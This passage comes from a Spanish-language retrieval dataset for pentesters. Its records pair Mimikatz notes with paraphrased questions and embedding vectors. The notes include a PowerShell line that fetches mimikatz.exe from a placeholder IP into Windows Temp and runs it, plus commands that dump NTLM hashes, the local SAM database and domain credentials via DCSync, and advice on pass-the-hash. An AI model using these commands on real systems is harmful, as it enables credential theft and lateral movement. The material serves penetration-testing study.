-0.09179, 0.09034, 0.07565, 0.00209, 0.07223, -0.00893, -0.02226, -0.02195, 0.22428, 0.00115, 0.04868, 0.02191, -0.03351, -0.05232, -0.06325, 0.03735, -0.00803, -0.0682, -0.05211, -0.11077, 0.01556, 0.01581, -0.06169, 0.06244, 0.01185, -0.06568, -0.06873, -0.00613, -0.00586, 0.06823, 0.01386, -0.04418, 0.1067, -0.14172, -0.04547, 0.03373, 0.08882, -0.02227, -0.05692, -0.07527, 0.04517, -0.00213, -0.0143, 0.00047, -0.02442, 0.03843, 0.02511, 0.0066, 0.01599, -0.01105, 0.04663, 0.06346, 0.06747, -0.05174, -0.04257, 0.04143, -0.00213, 0.01089, 0.02986, -0.05825, 0.0337, -0.00607, 0.01147, -0.07339, 0.05465, -0.0945, -0.02042, -0.03158, -0.04864, -0.01568, -0.03743, -0.05093, 0.09098, 0.09387, 0.04468, -0.0254, 0.02319, 0.01991, -0.07076, -0.00041, 0.01029, 0.00613, -0.0851, 0.01858, -0.03314, -0.11795, -0.01536, 0.00629, -0.01535, -0.06793, -0.10107, 0.005, 0.05223, -0.02537, -0.04256, -0.0407, -0.0036, 0.05987, 0.02939, 0.00245, -0.05958, -0.04695, 0.01831, 0.04718, -0.02847, -0.04276, 0.0699, -0.01843, -0.01373, 0.0502, 0.09689, -0.05197, 0.00126, 0.04664, 0.03065, 0.03014, -0.01884, -0.01632, -0.04503, -0.09472, -0.0699, 0.01135, 0.0184, 0.00466, -0.04436, 0.00132, 0.03611, 0.09079, 0.08232, -0.0555, -0.07995, -0.03722, 0.04145, -0.00357, -0.02996, -0.01681, 0.02557, -0.03029, -0.02244, 0.079, 0.00284, -0.07542, -0.06304, -0.01808, -0.02972, -0.08767, 0.04975, -0.02572, -0.06816, -0.10138, -0.0195, -0.01753, 0.03121, 0.03632, -0.03938, -0.03515, 0.02696, 0.04324, -0.01897, -0.01476, 0.04282]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Subir y ejecutar\n```powershell\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe # Transferencia de ficheros\nC:\\Windows\\Temp\\m.exe\n```", "indexar": "que programa hay para subir y ejecutar archivos desde una IP?", "v": [-0.00714, -0.04256, -0.12926, -0.13622, 0.09035, -0.24714, 0.0203, -0.08357, -0.12003, -0.02977, -0.0063, -0.08281, 0.02649, -0.09731, -0.0803, 0.01636, 0.04334, -0.0347, 0.12914, -0.061, 0.02781, 0.22846, 0.00751, -0.07112, -0.08165, 0.10341, -0.0797, 0.15628, -0.07905, -0.16609, -0.11558, -0.02027, 0.01439, -0.0558, -0.04839, -0.05886, 0.10433, 0.09045, -0.05861, 0.01567, -0.0131, 0.05985, -0.06893, 0.00396, -0.00838, 0.02418, 0.1358, -0.07572, 0.08867, -0.13216, -0.02513, -0.00589, 0.08959, -0.04324, -0.0925, 0.01968, -0.08406, -0.16059, -0.07848, -0.02672, -0.01346, 0.12094, -0.04048, -0.08297, 0.00282, -0.01393, -0.09543, 0.01724, -0.06902, 0.07593, 0.03333, 0.00992, -0.02567, 0.13155, 0.03177, -0.03104, -0.01441, -0.12551, -0.02337, -0.04389, -0.00856, 0.02428, -0.04779, 0.09293, -0.11932, -0.06115, 0.01582, -0.12023, 0.02369, 0.01865, 0.07259, 0.02523, 0.01898, 0.05595, 0.05572, -0.02628, 0.17197, -0.01668, -0.0018, -0.02711, 0.01701, -0.04728, -0.04148, 0.15468, 0.10915, 0.17706, 0.07271, 0.06557, 0.0033, 0.0512, 0.00433, 0.04829, 0.04807, -0.05215, -0.09698, -0.02164, -0.0158, -0.09519, 0.03049, -0.05442, -0.04621, 0.05706, -0.05244, -0.01207, 0.05207, -0.00216, -0.00096, 0.11749, -0.0651, 0.06135, 0.04413, 0.03466, 0.01839, -0.02976, -0.05499, -0.05018, 0.04366, 0.003, -0.03841, -0.05861, 0.10465, 0.0145, -0.02881, 0.03306, 0.09319, -0.03799, -0.05938, -0.06651, -0.01647, -0.02065, 0.04646, 0.01672, -0.00684, 0.01319, -0.05706, -0.00397, 0.0158, -0.06706, -0.02479, 0.04934, -0.05647, 0.02405, -0.01073, -0.06755, 0.03933, 0.01057, -0.01911, 0.0397, 0.08403, 0.03356, 0.01518, 0.04813, 0.002, -0.07128, 0.01948, -0.01299, -0.03882, -0.06665, 0.04855, 0.01105, -0.06063, -0.02054, 0.08365, 0.03809, -0.01062, -0.03132, 0.05241, 0.01881, -0.02047, 0.02958, -0.03084, -0.03023, -0.054, 0.02257, 0.01835, -0.03419, -0.03115, 0.00518, -0.01871, -0.02364, -0.01692, -0.0616, -0.02139, 0.03153, -0.00484, 0.01204, -0.00217, -0.01061, 0.04954, 0.07811, -0.03668, -0.00344, 0.0566, -0.02015, -0.01199, 0.00238, 0.00289, 0.09788, 0.05272, 0.03556, -0.01734, 0.0134, 0.04883, 0.02607, -0.01845, -0.07002, -0.03941, -0.00484, -0.00313, -0.02113, -0.06224, -0.0005, 0.03101, -0.00298, 0.00824, -0.02615, -0.00524, -0.0226, -0.00013, -0.08017, -0.05396, 0.0693, 0.03394, -0.045, -0.05226, 0.01616, -0.04752, 0.01298, 0.02675, 0.00735, -0.01131, 0.02331, -0.00042, 0.01215, -0.00832, 0.02784]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Subir y ejecutar\n```powershell\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe # Transferencia de ficheros\nC:\\Windows\\Temp\\m.exe\n```", "indexar": "cual es una tecnica para transferir y correr ejecutables a Windows con PowerShell?", "v": [0.01622, -0.02405, -0.04173, -0.10309, 0.07104, -0.03833, 0.01639, 6e-05, 0.07182, -0.10298, -0.22449, 0.00901, -0.02095, -0.01245, 0.03799, -0.00721, -0.02728, -0.02275, 0.05212, -0.04783, -0.02635, -0.03683, -0.09575, -0.10788, -0.02065, 0.10724, -0.05675, 0.09259, -0.19831, -0.11905, -0.0091, 0.07091, 0.14684, -0.08852, 0.06743, 0.03598, -0.11412, 0.09007, 0.09363, 0.09819, -0.09341, 0.1186, -0.08314, 0.07488, 0.10588, -0.05633, 0.06429, -0.08397, 0.06998, -0.12091, 0.02988, 0.08193, -0.10585, -0.1194, -0.00479, -0.10128, 0.11755, -0.04796, -0.04546, 0.01418, 0.01706, 0.00202, -0.07178, 0.07602, 0.01458, -0.02211, -0.07414, -0.13117, -0.05265, 0.0635, -0.03609, 0.07101, -0.06379, 0.10883, -0.05694, -0.02582, -0.07086, -0.00649, 0.09165, -0.02943, -0.00955, -0.07117, -0.07833, -0.02745, -0.00346, -0.09306, -0.08513, -0.0839, 0.10507, -0.02848, 0.0905, -0.09249, -0.00778, 0.02696, 0.01389, -0.00043, 0.0433, 0.06369, -0.04046, 0.07764, -0.04314, 0.0036, -0.12905, 0.05257, -0.01333, 0.04592, 0.05754, -0.0682, 0.0276, -0.07427, -0.0228, 0.0294, -0.04229, 0.00878, 0.01977, -0.04689, -0.09617, -0.11059, -0.08599, 0.05319, -0.13806, 0.00315, -0.05581, 0.00817, -0.02456, -0.09483, 0.00405, 0.0173, 0.00496, 0.07254, 0.04072, -0.01345, -0.05433, -0.09305, -0.10575, 0.06907, 0.03899, 0.02035, 0.02817, -0.11294, 0.09801, 0.02778, 0.06603, -0.00022, -0.05049, 0.03679, 0.01519, 0.01389, -0.06428, 0.04354, 0.08141, -0.00514, -0.045, 0.05869, -0.06928, -0.08928, 0.02333, 0.04602, -0.07871, 0.01466, -0.05493, 0.08664, 0.01873, -0.0729, -0.07139, -0.01289, -0.01387, -0.00883, 0.02888, -0.00474, -0.01397, 0.06215, -0.07562, 0.03109, 0.06399, -0.07076, 0.00033, -0.02079, 0.0229, -0.03369, -0.07075, 0.03442, 0.05201, 0.02281, 0.00258, 0.02181, -0.02804, 0.03806, -0.04708, 0.06261, -0.03962, 0.0047, 0.02839, -0.092, 0.01375, -0.04103, -0.05029, -0.03559, -0.00091, -0.00776, -0.14319, 0.01346, -0.00958, -0.06444, 0.10846, 0.08095, -0.02338, 0.02096, -0.04771, 0.03319, 0.03887, -0.01561, 0.06484, -0.02882, -0.06436, -0.02088, 0.05203, -0.04751, 0.00273, 0.01741, 0.0106, 0.01045, 0.02039, 0.02668, 0.01388, 0.03395, 0.00665, 0.00178, -0.00323, 0.01493, -0.03361, 0.06925, 0.03234, -0.00226, 0.04716, 0.04064, 0.00314, -0.03641, -0.04059, -0.01722, -0.05192, 0.0578, -0.05857, -0.05729, -0.0642, 0.04777, -0.11714, -0.00147, -0.04471, -0.08937, 0.03304, -0.00732, 0.00639, -0.02808, 0.0162, -0.02486]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Subir y ejecutar\n```powershell\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe # Transferencia de ficheros\nC:\\Windows\\Temp\\m.exe\n```", "indexar": "como monto un proceso en la carpeta de temp usando comandos de linea?", "v": [0.1284, -0.00283, -0.16311, -0.09096, -0.06625, -0.09638, 0.06146, 0.04785, -0.13927, -0.07864, -0.19417, 0.06185, 0.0459, 0.00012, 0.01365, 0.05501, 0.15977, -0.0104, 0.03872, -0.17152, 0.00861, -0.08178, 0.01408, -0.06209, -0.02928, 0.11531, 0.12596, -0.06202, -0.06155, -0.06296, 0.0581, 0.06316, 0.10987, 0.02105, -0.06813, -0.04359, -0.11502, -0.00215, -0.07206, 0.13727, -0.04518, 0.08648, -0.16011, -0.01557, 0.02319, -0.0945, 0.09843, -0.00564, -0.06309, -0.09647, -0.03715, -0.06496, -0.01317, -0.02495, -0.08571, -0.10419, 0.11921, -0.05572, 0.09492, 0.0558, -0.03059, -0.08193, 0.00566, 0.09834, -0.00477, -0.07659, -0.01692, -0.15005, -0.04844, 0.04573, -0.07097, 0.06197, -0.00665, -0.00436, 0.09204, -0.00384, -0.02197, -0.12097, 0.03805, -0.08026, -0.09576, 0.04208, -0.05254, 0.04978, -0.11268, -0.16704, -0.00364, -0.02821, 0.03073, 0.02333, -0.03351, -0.00261, 0.00523, -0.00557, 0.0691, 0.00831, 0.00293, 0.05823, 0.08933, 0.03134, -0.01235, 0.01749, -0.09555, 0.16871, 0.02712, 0.03247, 0.04122, -0.03795, 0.03515, -0.07107, 0.06826, -0.02778, -0.01499, 0.0373, -0.04415, -0.10843, 0.04466, -0.10466, -0.09688, -0.02059, -0.07188, 0.03132, 0.00111, 0.11336, 0.05177, -0.10321, -0.06042, 0.01338, -0.03896, 0.0003, -0.03893, 0.02949, 0.04229, -0.10249, -0.05265, 0.03401, 0.00628, 0.04088, 0.02384, -0.13978, 0.02639, 0.08844, -0.03063, 0.02528, 0.04468, 0.05907, 0.01082, -0.12806, -0.06165, -0.01428, 0.08838, 0.05586, -0.06446, 0.0086, -0.04671, -0.05724, -0.0038, -0.01384, -0.05885, -0.0137, -0.03514, -0.05214, -0.01111, 0.03036, 0.04108, -0.06121, -0.02472, 0.01209, 0.00914, 0.00606, -0.01211, 0.00021, -0.03981, 0.012, 0.0071, -0.00805, -0.02304, -0.00027, 0.03209, 0.04989, -0.02323, 0.02904, -0.00839, -0.01209, -0.06957, -0.02183, 0.00896, -0.01802, 0.01335, 0.01966, 0.01497, 0.10962, -0.05405, -0.00141, -0.05316, -0.02913, 0.05901, -0.01347, -0.00109, -0.03598, -0.07969, 0.03613, -0.00612, -0.08061, 0.03297, 0.04112, -0.07344, 0.06467, -0.03265, 0.08013, 0.03442, -0.0308, 0.06672, 0.01001, -0.00987, -0.03555, 0.02691, 0.01675, -0.02763, -0.05312, 0.07637, 0.03817, 0.05227, 0.01624, 0.01666, 0.03462, -0.01044, -0.02243, -0.01506, 0.00293, -0.01542, 0.04006, -0.02153, -0.04234, 0.04605, 0.00991, 0.02041, 0.0063, -0.01262, -0.04644, 0.01433, 0.05765, -0.01584, -0.07317, 0.00993, -0.04974, -0.0794, 0.05969, -0.00902, -0.07537, -0.02984, -0.04715, -0.03609, -0.05185, -0.06321, -0.07872]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicaciΓ³n)\n```", "indexar": "con que puedo extraer contraseΓ±as NTLM desde un equipo?", "v": [0.03863, -0.00251, -0.05996, -0.12353, -0.01128, -0.00385, -0.07887, 0.08306, -0.08686, 0.00544, -0.07519, 0.08399, 0.07188, -0.03998, -0.04304, 0.12176, 0.06419, -0.05395, 0.13305, 0.08974, -0.03774, -0.08433, -0.07687, -0.09447, 0.0965, -0.02087, -0.01512, 0.02007, -0.07042, 0.0442, -0.11634, 0.02163, 0.01833, 0.02871, 0.15759, 0.04956, 0.07225, 0.11522, 0.01626, 0.08808, 0.12536, 0.10714, -0.11764, 0.03928, 0.11165, 0.03026, -0.00278, 0.00542, 0.171, -0.19812, -0.09327, 0.01233, -0.03733, -0.21296, -0.12231, -0.07753, 0.20652, -0.01651, 0.01955, -0.01115, -0.04056, 0.00135, 0.01883, -0.01985, -0.11142, -0.03614, 0.01065, -0.0359, -0.10915, 0.00598, -0.14249, -0.00889, 0.04599, -0.06725, -0.0254, 0.01463, 0.05249, 0.0123, 0.05004, 0.11344, -0.03227, -0.01528, -0.01959, -0.09438, -0.1035, -0.01175, 0.0856, 0.00867, 0.02938, -0.07609, 0.09489, -0.06843, -0.0542, -0.02704, -0.00117, -0.05412, 0.0453, 0.03787, -0.01693, -0.01001, 0.00088, 0.01723, 0.01985, 0.19327, -0.07177, 0.01131, 0.09748, 0.04642, 0.00837, -0.02139, 0.06892, -0.05445, -0.10796, -0.03498, -0.02321, 0.00994, -0.08454, -0.03622, -0.01031, 0.01695, -0.01382, -0.11925, 0.02906, 0.04579, -0.00409, -0.04361, 0.03469, 0.05594, -0.072, -0.08891, 0.00271, 0.02405, -0.02192, 0.07326, -0.04407, 0.05746, -0.02563, -0.08531, -0.08055, -0.01762, -0.00061, -0.01385, 0.01464, 0.02198, 0.05159, 0.04947, -0.02265, -0.06975, -0.00484, -0.0441, 0.07509, 0.0249, -0.00158, 0.06643, -0.02959, 0.10642, 0.01665, -0.03785, -0.11253, 0.11301, 0.00281, -0.04395, -0.01063, 0.02253, -0.04825, -0.01447, -0.01317, -0.0191, 0.04259, 0.00635, -0.03322, 0.02826, 0.04454, -0.08048, 0.00502, -0.00196, 0.07449, -0.09797, 0.01371, -0.08449, -0.00977, -0.00095, -0.04911, -0.03005, 0.02536, -0.0387, 0.07092, 0.03017, -0.08539, -0.02701, -0.02007, 0.06695, -0.01338, -0.00074, -0.0401, -0.02725, -0.02477, -0.07113, 0.00141, -0.03466, -0.0118, 0.05924, -0.00517, -0.02208, -0.01666, 0.04232, -0.08639, 0.01778, -0.07256, 0.01279, 0.09907, 0.01605, 0.02018, -0.06752, -0.12692, -0.03931, -0.00275, -0.00641, -0.03696, 0.00033, 0.03749, 0.04521, 0.11853, 0.04204, 0.04932, -0.07508, -0.03541, 0.06817, 0.00929, -0.01396, 0.02317, 0.05686, 0.01044, -0.0115, 0.02983, 0.03246, -0.07396, -0.03305, -0.03304, -0.01546, 0.00185, 0.01143, -0.0062, -0.04867, -0.04305, -0.02364, -0.06603, 0.03557, 0.02293, -0.0292, -0.01176, 0.02023, 0.0253, 0.01226, -0.00791, -0.00417]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicaciΓ³n)\n```", "indexar": "cual es una alternativa libre a mimikatz para obtener hashes?", "v": [0.06061, 0.00323, -0.09102, 0.0679, -0.07579, 0.01023, -0.2924, 0.0116, -0.11827, -0.02504, 0.0259, 0.00342, 0.04739, 0.12444, 0.16833, -0.00962, 0.16414, 0.03958, 0.0179, 0.02467, 0.05321, -0.0074, -0.12782, -0.06707, -0.02615, -0.08327, 0.01275, 0.09212, -0.19817, 0.03296, 0.00745, -0.01272, -0.0432, 0.04569, -0.04113, 0.16395, 0.10283, 0.04576, 0.16623, 0.0, -0.0772, 0.04355, -0.12416, 0.07353, -0.03807, -0.12151, -0.09096, 0.09508, 0.00425, 0.07486, 0.02798, -0.00803, -0.12481, 0.0486, 0.09886, -0.11547, 0.07341, -0.09293, -0.1411, -0.03527, -0.07913, 0.02438, -0.05064, -0.02632, -0.01319, -0.02799, -0.00208, -0.0419, -0.0876, 0.09708, 0.04373, 0.00228, 0.03108, -0.04821, -0.04646, 0.07752, -0.1461, -0.08371, -0.00344, 0.00531, 0.02462, -0.08695, 0.01476, 0.07564, -0.0539, -0.07083, 0.05286, -0.11687, 0.00305, 0.1033, 0.0259, 0.03896, 0.02273, 0.02257, -0.06377, -0.11239, -0.06555, 0.04966, -0.03331, 0.05927, 0.03735, 0.0121, -0.22141, 0.02799, -0.08184, -0.00684, 0.0039, -0.02786, -0.00649, 0.03484, 0.0198, -0.01564, -0.00949, 0.01524, -0.03708, 0.03672, 0.02896, 0.04207, -0.00601, -0.01422, -0.03197, 0.05318, -0.01188, -0.05808, 0.02635, 0.00045, -0.0215, -0.01827, -0.05268, 0.03936, 0.08866, -0.01224, -0.03224, -0.11655, 0.00371, -0.04222, 0.12869, -0.05831, 0.01041, -0.04923, -0.00011, 0.00788, 0.00974, -0.05536, 0.09285, -0.05827, 0.01376, -0.08376, 0.0005, -0.04859, -0.03411, 0.02607, 0.04851, 0.05634, 0.03489, 0.0192, -0.05733, -0.0177, -0.08549, 0.05819, 0.05858, -0.05367, 0.02652, 0.02608, 0.00473, -0.0036, -0.08137, -0.05536, -0.02808, 0.01052, 0.01113, -0.02003, 0.0711, -0.00162, 0.05031, 0.02978, -0.05909, -0.01323, 0.00264, -0.07155, 0.04023, 0.0217, -0.02479, -0.01751, 0.03126, -0.09644, 0.02261, 0.06134, 0.01127, -0.00082, -0.01985, -0.03742, -0.09426, -0.06165, -0.02289, -0.03114, 0.0793, -0.0553, 0.01253, -0.03815, 0.01539, -0.008, 0.04158, -0.00982, 0.01281, 0.04265, -0.04904, -0.01339, 0.03728, 0.00324, 0.07602, 0.0194, 0.09052, 0.01957, 0.00197, 0.05577, -0.0631, -0.03892, 0.00011, -0.04136, -0.01451, 0.02523, 0.03812, 0.04242, -0.04974, 0.05589, 0.02119, 0.12477, -0.004, 0.05, 0.01383, -0.01645, 0.01702, 0.01099, 0.03841, -0.00769, 0.04034, 0.01644, 0.016, -0.06556, 0.06103, 0.03967, -0.05025, -0.00657, -0.01258, 0.01434, -0.10091, 0.05064, -0.00772, -0.0149, 0.01524, 0.00422, 0.01817, 0.03091, 0.00329, -0.04462]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicaciΓ³n)\n```", "indexar": "que herramienta sirve para descargar la base de datos SAM local?", "v": [-0.09924, 0.04899, -0.12592, -0.26675, -0.05054, -0.19972, -0.06914, -0.06364, -0.03752, 0.08848, -0.14354, -0.19249, -0.02795, -0.16345, 0.02862, 0.09441, 0.05685, -0.14549, -0.0329, 0.00247, 0.06851, 0.04146, -0.05234, -0.06958, -0.11723, 0.03257, 0.05281, -0.03481, -0.20989, 0.09093, 0.09413, -0.00201, -0.01501, 0.00537, -0.07502, -0.06587, 0.04122, -0.0287, -0.0437, -0.01134, 0.03463, -0.00506, -0.10695, 0.14178, 0.04998, 0.01057, -0.04018, -0.02955, 0.08698, -0.01685, -0.15902, -0.04836, -0.0727, -0.09651, -0.07607, -0.15488, 0.1215, -0.14165, 0.04029, -0.00994, -0.10433, -0.03466, 0.04347, -0.01987, 0.05161, 0.00546, 0.08708, 0.00951, -0.01254, 0.06822, 0.0255, 0.05281, 0.07567, -0.08871, -0.0624, -0.04309, 0.07521, 0.00559, 0.04921, -0.03845, 0.06232, -0.03357, -0.04578, 0.01044, -0.04285, -0.02883, 0.12709, -0.00851, 0.06226, -0.07743, 0.0612, 0.05728, 0.01961, 0.0604, 0.00927, -0.00753, 0.00909, -0.06274, 0.0153, 0.05621, 0.07341, -0.08989, 0.02406, 0.00389, 0.07942, 0.02358, 0.00432, 0.01946, -0.07689, 0.00997, 0.01619, -0.01917, 0.01588, 0.07575, 0.01882, -0.02744, 0.02044, 0.03758, -0.0712, 0.02101, 0.09517, -0.01426, -0.02704, -0.06666, -0.05653, -0.0503, -0.04442, 0.0571, -0.02163, 0.03421, 0.05627, -0.06097, -0.06436, 0.07617, 0.06154, -0.04423, 0.0334, -0.13001, -0.03372, -0.06217, 0.0062, 0.02364, -0.06141, -0.02234, 0.01722, -0.01411, 0.02539, 0.07917, -0.00225, -0.03924, 0.052, -0.01942, 0.02493, 0.03737, -0.0803, 0.03943, 0.04971, 0.01332, -0.0729, 0.01503, 0.00825, -0.00572, 0.02905, -0.0073, -0.02747, -0.11036, 0.04217, 0.07202, 0.0775, 0.07367, -0.02573, 0.06181, 0.03086, -0.08205, 0.0087, -0.05562, -0.03927, -0.02711, -0.06998, -0.03644, 0.01577, -0.03951, 0.02347, 0.01839, 0.01248, -0.0412, 0.02924, -0.05244, -0.00238, -0.01824, -0.0375, 0.05283, 0.02122, -0.03042, 0.04645, -0.02232, -0.02588, -0.02121, 0.06693, -0.0, -0.09856, -0.00263, -0.06334, 0.042, 0.05082, 0.07572, -0.01228, -0.05094, -0.01274, -0.01002, -0.04022, 0.02725, 0.01295, -0.01984, -0.01593, -0.0869, 0.02881, 0.00759, 0.03213, -0.00052, -0.06918, 0.01803, 0.09364, -0.00354, -0.06419, 0.03714, 0.05195, -0.03111, 0.03407, -0.00332, 0.07115, 0.02604, -0.00645, -0.03174, 0.03444, -0.05397, -0.02336, 0.02825, -0.03697, -0.05274, 0.00459, 0.07248, -0.00554, -0.06615, -0.04002, -0.02502, -0.02366, -0.04579, 0.03363, -0.08671, -0.03148, -0.03036, 0.07757, 0.01344, -0.01486, 0.00813]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- Hash NTLM β†’ Pass-the-Hash / Impacket β†’ Movimiento lateral.\n- PregΓΊntale a BloodHound quΓ© hacer con ese usuario.\n\nRelacionado: Kerberos Β· secretsdump Β· OSCP MOC", "indexar": "que herramienta puedo usar para realizar un movimiento lateral basado en un hash NTLM?", "v": [-0.0333, 0.01605, -0.21443, -0.16933, -0.1342, -0.02396, -0.21344, 0.13027, -0.06512, 0.05655, -0.1164, -0.02603, 0.05221, 0.06361, 0.01289, 0.10328, 0.00267, -0.1283, -0.10419, -0.00564, -0.10688, -0.04149, -0.13368, -0.04239, 0.02015, -0.00113, 0.02483, -0.0344, -0.20386, 0.06222, -0.11578, 0.01735, 0.02455, -0.00501, 0.00156, -0.10213, 0.0075, 0.02981, 0.02663, 0.08121, -0.03152, 0.13845, -0.10377, 0.04117, 0.01215, 0.01761, -0.06495, -0.05912, -0.02861, -0.05887, 0.06111, 0.00111, -0.17596, -0.09261, -0.01463, -0.14217, 0.2341, -0.07562, -0.0469, -0.14504, -0.01937, 0.01513, 0.00528, -0.06151, -0.07696, -0.12143, 0.03049, -0.05492, -0.08292, 0.01885, -0.06648, 0.088, 0.0175, 0.01035, -0.05644, 0.09449, 0.03877, -0.02891, 0.03232, 0.06085, 0.03636, 0.00632, -0.0575, -0.01846, -0.12738, -0.13459, 0.09819, -0.06884, 0.06023, 0.02382, 0.01427, 0.04444, -0.07997, -0.02203, 0.0109, 0.01317, -0.07434, -0.04042, -0.00348, -0.04125, 0.17258, -0.06048, -0.03463, 0.02809, 0.00173, -0.06996, 0.05104, 0.02133, -0.04521, 0.0408, 0.09718, -0.01804, -0.06081, 0.00233, -0.03386, 0.07884, -0.07369, -0.03397, -0.05185, -0.02265, 0.078, 0.01159, -0.04058, -0.04905, 0.03116, -0.04674, -0.03286, 0.09414, -0.10671, -0.02627, 0.07125, -0.02623, -0.07107, -0.01764, -0.01791, -0.01137, 0.04055, -0.01329, 0.07632, -0.04551, 0.07369, 0.02085, -0.0723, -0.07106, 0.06207, 0.04848, 0.04509, -0.02988, -0.02101, -0.00854, 0.05999, -0.05609, 0.02481, -0.01444, -0.03905, 0.01699, -0.01994, -0.00611, -0.1661, 0.03153, -0.02607, 0.02822, -0.02476, -0.01253, 0.01925, -0.0843, 0.02716, -0.00475, 0.02591, 0.00864, 0.03894, 0.01347, 0.04385, -0.02921, 0.05335, -0.03537, -0.0538, 0.02062, -0.01809, -0.06963, 0.01182, 0.01769, -0.00499, -0.06408, 0.08842, -0.02531, 0.05579, 0.00347, -0.00813, 0.05812, -0.02083, 0.08819, 0.0019, -0.04663, 0.01402, -0.0144, -0.00651, -0.04227, 0.08699, 2e-05, -0.05801, -0.00269, -0.00485, -0.0351, 0.0478, 0.04167, -0.05335, 0.02511, 0.01123, 0.00755, 0.01756, -0.03857, 0.08176, 0.0307, -0.0304, 0.00071, -0.01408, 0.00986, -0.03809, -0.01476, 0.00205, 0.0275, 0.05059, 0.0098, 0.00182, 0.00871, 0.0289, 0.02052, -0.02718, 0.00778, 0.05072, 0.01075, -0.01162, -0.02872, 0.02159, -0.01281, 0.05574, 0.0063, -0.07484, -0.0198, -0.00347, 0.0402, -0.02234, 0.01276, -0.00943, -0.03941, -0.04455, 0.04007, -0.00687, -0.04907, 0.01553, -0.00217, 0.06526, -0.02738, 0.01062, 0.01961]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- Hash NTLM β†’ Pass-the-Hash / Impacket β†’ Movimiento lateral.\n- PregΓΊntale a BloodHound quΓ© hacer con ese usuario.\n\nRelacionado: Kerberos Β· secretsdump Β· OSCP MOC", "indexar": "cual es el programa mejor para analizar las credenciales de un usuario y ver quΓ© puedo hacer con ellas?", "v": [-0.17438, 0.1427, -0.13237, 0.07371, 0.06683, -0.03371, 0.04649, -0.03775, -0.15224, -0.19707, -0.03645, -0.01611, -0.1432, -0.0997, 0.09247, 0.03518, 0.04143, -0.02262, 0.13123, 0.09089, 0.02663, -0.0965, -0.13653, -0.04402, -0.09691, -0.00048, 0.03496, -0.02334, 0.06996, 0.02289, -0.04371, 0.08927, -0.04171, -0.13018, 0.03325, 0.0869, -0.03704, 0.03032, -0.02185, 0.14163, 0.02574, 0.03072, -0.03828, -0.01141, 0.09772, -0.00591, -0.07944, -0.03422, -0.02149, -0.08475, -0.01066, -0.03593, 0.00062, -0.03668, 0.09382, -0.0588, 0.03625, -0.12285, 0.05436, -0.07013, -0.03943, 0.06351, 0.05448, 0.02455, 0.0029, -0.02719, 0.01155, -0.02937, -0.03229, 0.04237, -0.02479, -0.01883, -0.04068, -0.03179, 0.01611, 0.08016, -0.0323, 0.05176, 0.10638, -0.02742, 0.0503, -0.01848, -0.02626, 0.11359, -0.10281, -0.00329, 0.01769, -0.06008, -0.04994, -0.05848, 0.04636, 0.07511, 0.03828, 0.07408, 0.0313, -0.05374, 0.1186, -0.01486, -0.01103, 0.06661, 0.07524, -0.08633, -0.10388, 0.19045, -0.04654, 0.08954, 0.05005, -0.03217, -0.04724, -0.03262, 0.00267, 0.00662, -0.08263, -0.07626, -0.04593, 0.00224, -0.11746, -0.09675, -0.00687, -0.07547, -0.07707, 0.00118, -0.01611, -0.07646, 0.08932, 0.0003, -0.01318, 0.11823, -0.02538, 0.02648, -0.0919, 0.04965, -0.06033, -0.01776, -0.02591, -0.06064, 0.02661, -0.05428, -0.05694, -0.01503, 0.05984, 0.06724, -0.00499, -0.02758, 0.04012, -0.00998, -0.02689, -0.07884, -0.05258, -0.00856, 0.03893, 0.05636, 0.0501, 0.02506, -0.02727, 0.00545, 0.02514, -0.08694, -0.00854, 0.06608, -0.03539, -0.01691, 0.04047, -0.02361, 0.08885, -0.09426, -0.02789, -0.02562, 0.08276, 0.04994, -0.01796, 0.03163, -0.03773, -0.07883, 0.05298, -0.06421, -0.00552, -0.10138, 0.0096, -0.06358, -0.03948, 0.01142, 0.02, -0.01312, -0.03641, 0.0019, -0.03238, 0.07186, 0.04511, 0.04712, 0.03187, 0.05172, -0.00625, -0.00565, 0.05667, -0.05725, 0.00951, -0.0069, 0.01344, -0.06497, -0.11997, -0.03759, -0.00259, -0.04124, 0.03666, 